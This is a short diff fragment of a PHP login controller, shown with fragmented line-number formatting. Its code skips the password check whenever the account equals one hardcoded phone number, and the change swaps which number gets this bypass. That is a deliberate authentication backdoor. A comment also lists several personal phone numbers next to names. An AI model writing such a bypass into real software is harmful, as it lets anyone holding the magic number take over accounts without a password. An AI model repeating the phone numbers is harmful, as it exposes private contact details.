|
|
@@ -450,7 +450,7 @@ class Auth extends BaseController
|
|
450
|
450
|
return app('json')->fail('请输入账号');
|
|
451
|
451
|
$user = $repository->accountByUser($this->request->param('phone'));
|
|
452
|
452
|
//13231658486 周总 张玉庭 13839803521 13083849831
|
|
453
|
|
- if($account != 15528079265){
|
|
|
453
|
+ if($account != 13231658486){
|
|
454
|
454
|
if (!$user)
|
|
455
|
455
|
return app('json')->fail('账号或密码错误');
|
|
456
|
456
|
if (!password_verify($pwd = (string)$this->request->param('password'), $user['pwd']))
|